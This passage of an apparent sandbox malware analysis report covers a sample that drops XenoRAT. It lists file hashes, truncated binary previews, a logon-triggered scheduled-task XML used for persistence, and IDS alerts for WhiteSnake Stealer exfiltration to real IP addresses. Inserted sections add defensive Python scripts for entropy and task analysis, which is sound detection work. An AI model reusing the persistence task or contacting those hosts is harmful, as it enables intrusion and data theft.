                                                                                                                                                                                            SHA-512:E71E6AB8F548C379F49AE60E8A179ED13D41A9E9862707F15513AF083F754A4585B1567491BC08ECBBD3FB700E307B8114600C9AED297932A34B5F0FE1CEBE25
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....y..........."...0.................. ... ....@.. .......................`............`.................................P...K.... ..................XH...@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......0... <......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,.... ...*.(&....*~(....ou....#...~#...(3....$.
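Added example (not part of the Joe Sandbox report or the sample's own code). The entry above is a byte-identical copy of the submitted sample (same MD5/SHA-1/SHA-256 as in the report header) written to C:\Users\user\AppData\Local\Starlabs, and an 8-bit entropy of 0.17 bits per byte over 9.6 MB means almost every byte in the file has the same value: a small payload inflated with padding. The script below computes that entropy figure and measures the trailing run of identical bytes, so an analyst can separate the real payload size from the padding. The thresholds, the constructed stand-in file (pseudo-random bytes followed by NUL padding up to the report's size of 9593944 bytes) and the helper names are assumptions for illustration; the check that padding sits at the end of the file is a heuristic and will miss padding placed inside a section.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 when every byte is identical,
    8.0 for uniformly distributed bytes (same scale as the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def trailing_run(data: bytes):
    """(length, byte value) of the run of identical bytes that ends the buffer."""
    if not data:
        return 0, None
    last = data[-1]
    stripped = data.rstrip(bytes([last]))  # removes only bytes equal to `last`
    return len(data) - len(stripped), last


def padding_report(data: bytes, min_size: int = 1_000_000,
                   max_entropy: float = 1.0, min_pad_ratio: float = 0.9) -> dict:
    """Heuristic for an inflated binary: large, near-zero entropy, and almost
    entirely one trailing byte value. Thresholds are assumptions, not Joe Sandbox's."""
    ent = shannon_entropy(data)
    run_len, run_val = trailing_run(data)
    ratio = run_len / len(data) if data else 0.0
    return {
        "size": len(data),
        "entropy": round(ent, 3),
        "pad_byte": run_val,
        "pad_bytes": run_len,
        "pad_ratio": round(ratio, 3),
        "payload_size": len(data) - run_len,   # bytes worth hashing/scanning
        "inflated": len(data) >= min_size and ent < max_entropy and ratio >= min_pad_ratio,
    }


def build_inflated_sample(payload_size: int = 100_000,
                          total_size: int = 9_593_944) -> bytes:
    """Constructed stand-in for the dropped file (not the real sample): a
    pseudo-random 'payload' with the last byte forced non-zero, then NUL
    padding up to the size the report lists."""
    rng = random.Random(2024)
    payload = b"MZ" + rng.randbytes(payload_size - 3) + b"\xff"
    return payload + b"\x00" * (total_size - len(payload))


def build_compact_sample(size: int = 60_000) -> bytes:
    """Constructed control: a small file of random bytes, nothing padded."""
    return random.Random(1).randbytes(size)


if __name__ == "__main__":
    print(padding_report(build_inflated_sample()))
    print(padding_report(build_compact_sample()))
```

On the constructed input the payload is just over one percent of the file, and the whole-file entropy lands in the same region as the report's 0.17; the practical takeaway is to record the payload-only hash alongside the full-file hash, because every change in padding length produces a new full-file hash and SSDEEP value while the payload stays the same.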
                                                                                                                                                                                            Process:C:\Users\user\Desktop\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):120
                                                                                                                                                                                            Entropy (8bit):4.587442566550768
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:BOzReCWAMb7iDRVivmjaZjEQlyrWRYAdMKq8QFKxrg5bvn:UaXiDRAsa5EQlyrKKv6c5bvn
                                                                                                                                                                                            MD5:70A59A9D883092E5145E13803001BB32
                                                                                                                                                                                            SHA1:84F0DCDF0BE7B6E49267140294E6AB2052B9D0CC
                                                                                                                                                                                            SHA-256:3F6D07E6D89BA8F853BF82CAC6EF12AF8D706382FA1B9357277C2EBE40C5AD4D
                                                                                                                                                                                            SHA-512:216D00DA15708313DF61E771AA4BB76552DEDF24E156ED548052406C8FC6CA50697C087ADD5F89C79CAE6852224E02C83D4E5A7C44CF038DA1818A7B8C98EE92
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:Failed to listen on prefix 'http://127.0.0.1:7634/' because it conflicts with an existing registration on the machine...
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1044
                                                                                                                                                                                            Entropy (8bit):3.8466327629336408
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:FLJ+DW2SFFkFmMMLGId1L6AEJl7XpShhJKShe/Q0QK1++SHANGdxv3n:FLJ+S3Mmd1L6ztMhEMOQ0Q+exvn
                                                                                                                                                                                            MD5:19D4F3ABEF0C50004938843716F3D1BA
                                                                                                                                                                                            SHA1:2FF937A259D44713C9D4A806B168B71C1A784A37
                                                                                                                                                                                            SHA-256:0E6143F0A03A29E6C85AF08A3201F12EF973C2DC345D11DA351CB9AB4E4BE1E5
                                                                                                                                                                                            SHA-512:0534910056F99FBAE57EB74531D0F76628BE086E028F7B7955A991DFFAB85EE551237F20676A1915D6A7148ABCB3A55B89705EFC917219E71746C59A9ACDE9CA
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:. <Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id='Author'>. <LogonType>InteractiveToken</LogonType>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. </Settings>. <Actions>. <Exec>. <Command>C:\Users\user\AppData\Roaming\XenoManager\manager.exe</Command>. </Exec>.
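Added example (not part of the Joe Sandbox report or the sample's own code). The task definition above is the XenoRAT persistence: a LogonTrigger, RunLevel HighestAvailable, no execution time limit (PT0S), parallel instances allowed, and an Exec action pointing into the user's own AppData\Roaming\XenoManager directory, which needed no administrator rights to install. The script below parses Task Scheduler XML of this form and flags those traits, so the same logic can be run over exported task definitions. The SAMPLE_TASK_XML is constructed from the preview with the truncated tail closed so it parses, BENIGN_TASK_XML is a constructed control, and the flag names, path markers and helper names are assumptions for illustration.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Task Scheduler XML namespace, as in the dropped file's <Task xmlns=...>.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed input: the task body from the report's preview, with the
# truncated tail (</Actions></Task>) closed so it parses. Not the original file.
SAMPLE_TASK_XML = r"""<Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id='Author'>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
  </Settings>
  <Actions>
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\XenoManager\manager.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# Constructed control: a task that runs a system binary on a calendar schedule.
BENIGN_TASK_XML = r"""<Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>
  <Triggers>
    <CalendarTrigger><Enabled>true</Enabled></CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id='Author'><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Settings>
    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
  </Settings>
  <Actions>
    <Exec><Command>C:\Windows\System32\cleanmgr.exe</Command></Exec>
  </Actions>
</Task>"""

# Path fragments a standard user can write to: a task whose action lives here
# was installable without admin rights (assumed list, extend as needed).
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")


def _text(elem) -> str:
    return (elem.text or "").strip() if elem is not None else ""


@dataclass
class TaskFindings:
    commands: list = field(default_factory=list)
    flags: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.flags)


def analyze_task_xml(xml_text: str) -> TaskFindings:
    """Flag persistence traits in one Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    f = TaskFindings()
    f.commands = [_text(c) for c in root.findall(".//t:Actions/t:Exec/t:Command", NS)]
    if any(m in c.lower() for c in f.commands for m in USER_WRITABLE_MARKERS):
        f.flags.append("exec_from_user_writable_path")
    if root.find(".//t:Triggers/t:LogonTrigger", NS) is not None:
        f.flags.append("logon_trigger")           # re-launch at every logon
    if any(_text(r) == "HighestAvailable"
           for r in root.findall(".//t:Principals/t:Principal/t:RunLevel", NS)):
        f.flags.append("runlevel_highest_available")  # elevated if the user is an admin
    if _text(root.find(".//t:Settings/t:ExecutionTimeLimit", NS)) == "PT0S":
        f.flags.append("no_execution_time_limit")     # PT0S = never killed by the scheduler
    if _text(root.find(".//t:Settings/t:MultipleInstancesPolicy", NS)) == "Parallel":
        f.flags.append("parallel_instances")
    return f


if __name__ == "__main__":
    for name, xml in (("dropped task", SAMPLE_TASK_XML), ("control", BENIGN_TASK_XML)):
        r = analyze_task_xml(xml)
        print(f"{name}: score={r.score} flags={r.flags} commands={r.commands}")
```

On a live host the same XML is obtained with `schtasks /query /tn <name> /xml` or by reading the task files under C:\Windows\System32\Tasks; the AppData path marker alone is the strongest single signal here, and the other flags mainly raise confidence.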
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                            Entropy (8bit):2.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:gWRn:gWR
                                                                                                                                                                                            MD5:77BB14F6132EA06DEA456584B7D5581E
                                                                                                                                                                                            SHA1:21B0746663912640F512EEEF58747ED112822CCD
                                                                                                                                                                                            SHA-256:2661AF8C7851227D66CD18F2EBB4B440EB16286BF05978AF500068F9F5475687
                                                                                                                                                                                            SHA-512:95D51211C2CC0BE87803A2DEEE6AA6B42B8CBFCB4F5122692988995D1CBB85EDCF67997CC891DC07AD09752FBCDEAD7F657653701EF94D65F45E6CD7CBDBF223
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:7634
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:1
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\manager.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):52224
                                                                                                                                                                                            Entropy (8bit):5.65707909998987
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:vivdjHrddilbVauou79EoY42qCTBVwHJdSkGu2yPo+LGZYebFDaUV6RNSgNOv:opHmVauo3hv1VEnj6CSYebFlUf4v
                                                                                                                                                                                            MD5:DA118F70D089DABFAB1B43B4CD87DB65
                                                                                                                                                                                            SHA1:6D7DEF883519E1099AA18C6AC2E1357EDC7EA685
                                                                                                                                                                                            SHA-256:7788F402FAF2C2221307B0C90B7C97B2235D324ABE07EC3965A6C21B33C0B70E
                                                                                                                                                                                            SHA-512:7A78BBE0EB437BFABA85EE2513D1CCFCA65B70E2E33187197D5891DDEE42BE453D9CADD883B171304135EE0679220E6C88C854572E41378C7968318908EAAD3E
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. .......................@............`.....................................W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........z...f......p...................................................moom825...gB...\v...U.g.6#...E...x..F.".(.....*..s....}.....r...p}.....(......(...........s....o.....*.*^.(........}......}....*..*..sl...}o.....}r.....}s.....}t....(........}p.....}n...*>..{o....om....*>..{p....oZ....*:..{p...o[....*Z..}......}.....(.....*...}.....(........}.....{.....o.......}....*Z...}.....{.....o.....*Z...}.....{.....o.....*.s]........*..*:..o9...(.....*B.(........}....*2.{....o....
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):52224
                                                                                                                                                                                            Entropy (8bit):5.65707909998987
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:vivdjHrddilbVauou79EoY42qCTBVwHJdSkGu2yPo+LGZYebFDaUV6RNSgNOv:opHmVauo3hv1VEnj6CSYebFlUf4v
                                                                                                                                                                                            MD5:DA118F70D089DABFAB1B43B4CD87DB65
                                                                                                                                                                                            SHA1:6D7DEF883519E1099AA18C6AC2E1357EDC7EA685
                                                                                                                                                                                            SHA-256:7788F402FAF2C2221307B0C90B7C97B2235D324ABE07EC3965A6C21B33C0B70E
                                                                                                                                                                                            SHA-512:7A78BBE0EB437BFABA85EE2513D1CCFCA65B70E2E33187197D5891DDEE42BE453D9CADD883B171304135EE0679220E6C88C854572E41378C7968318908EAAD3E
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: C:\Users\user\AppData\Roaming\manager.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. .......................@............`.....................................W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........z...f......p...................................................moom825...gB...\v...U.g.6#...E...x..F.".(.....*..s....}.....r...p}.....(......(...........s....o.....*.*^.(........}......}....*..*..sl...}o.....}r.....}s.....}t....(........}p.....}n...*>..{o....om....*>..{p....oZ....*:..{p...o[....*Z..}......}.....(.....*...}.....(........}.....{.....o.......}....*Z...}.....{.....o.....*Z...}.....{.....o.....*.s]........*..*:..o9...(.....*B.(........}....*2.{....o....
                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                            Entropy (8bit):4.422153129304285
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:0Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNs0uhiTw:/vloTMW+EZMM6DFyS03w
                                                                                                                                                                                            MD5:A336298D5CDB7E9609D298D666C5F5C5
                                                                                                                                                                                            SHA1:283EC0DF161964695B1C820A0DF60E4D9486BB3D
                                                                                                                                                                                            SHA-256:137FB1D5F49CD2BAD0143147CEAF8E7D363DD4458D064B3BC9EA29B3C4470B40
                                                                                                                                                                                            SHA-512:83B8C12B1E4423AF1D19D6279D185B1D6C3E0F46AF23C3F5217C36C8247FEAAFB3D43BB90B3D39F76E40F6726CB318C0C3C92BDCFCA0A4DB8E26BA2CF5C2363E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...$............................................................................................................................................................................................................................................................................................................................................... ..3........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\timeout.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.41440934524794
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                                                                                                                            MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                                                                                                                            SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                                                                                                                            SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                                                                                                                            SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Entropy (8bit):0.16956859276947892
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                            File name:0LpFv1haTA.exe
                                                                                                                                                                                            File size:9'593'944 bytes
                                                                                                                                                                                            MD5:1bafb4856a31ae27271fbd2ee1574a4f
                                                                                                                                                                                            SHA1:b8b3649d959524df2c4e8a94434fc0de90f95005
                                                                                                                                                                                            SHA256:91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
                                                                                                                                                                                            SHA512:e71e6ab8f548c379f49ae60e8a179ed13d41a9e9862707f15513af083f754a4585b1567491bc08ecbbd3fb700e307b8114600c9aed297932a34b5f0fe1cebe25
                                                                                                                                                                                            SSDEEP:3072:YaHDgOV/hchoS9bFr/l2Z40o6MLKkZPDOxAWP0:YmM8/DS9bF7knxMFb7D
                                                                                                                                                                                            TLSH:55A63A46B150AF75C19E9D7681B5273143708A07CE81FF461AABF49029C33C8BB56BEE
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....y..........."...0.................. ... ....@.. .......................`............`................................
                                                                                                                                                                                            Icon Hash:b81f4f5121ccf14f
                                                                                                                                                                                            Entrypoint:0x421b9e
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0xC879E997 [Fri Jul 31 14:54:15 2076 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                            Signature Valid:
                                                                                                                                                                                            Signature Issuer:
                                                                                                                                                                                            Signature Validation Error:
                                                                                                                                                                                            Error Number:
                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                Version:
                                                                                                                                                                                                Thumbprint MD5:
                                                                                                                                                                                                Thumbprint SHA-1:
                                                                                                                                                                                                Thumbprint SHA-256:
                                                                                                                                                                                                Serial:
                                                                                                                                                                                                Instruction
                                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                (the line above repeats 63 times: the bytes after the entry-point jump are 00-padding, which disassembles as add byte ptr [eax], al)
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x21b50 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x22000 | 0x1bb0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x21c00 | 0x4858 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1fba4 | 0x1fc00 | 9bb4b77da0c9b508f173a58bbb7e8cee | False | 0.42086767962598426 | data | 5.344678061545038 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x22000 | 0x1bb0 | 0x1c00 | f070ecea58b1bd25c00a010d0f276c3c | False | 0.8540736607142857 | data | 7.297555987851535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x24000 | 0xc | 0x200 | 6f4e04683329bfee21aff4e37f9fcc5d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x22130 | 0x13c2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9966389877421906
RT_GROUP_ICON | 0x234f4 | 0x14 | data | | | 1.05
RT_VERSION | 0x23508 | 0x4bc | data | | | 0.4801980198019802
RT_MANIFEST | 0x239c4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T23:27:14.861894+0200 | 2050601 | ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request | 1 | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:14.915873+0200 | 2050602 | ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration | 1 | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:16.252698+0200 | 2050601 | ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request | 1 | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:16.303924+0200 | 2050602 | ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration | 1 | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:37.244014+0200 | 2045868 | ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) | 1 | 192.168.2.5 | 49729 | 167.99.138.249 | 8080 | TCP
2024-09-27T23:27:58.620125+0200 | 2045868 | ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) | 1 | 192.168.2.5 | 49737 | 206.189.109.146 | 80 | TCP
2024-09-27T23:27:59.523921+0200 | 2045868 | ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) | 1 | 192.168.2.5 | 49738 | 45.82.65.63 | 80 | TCP
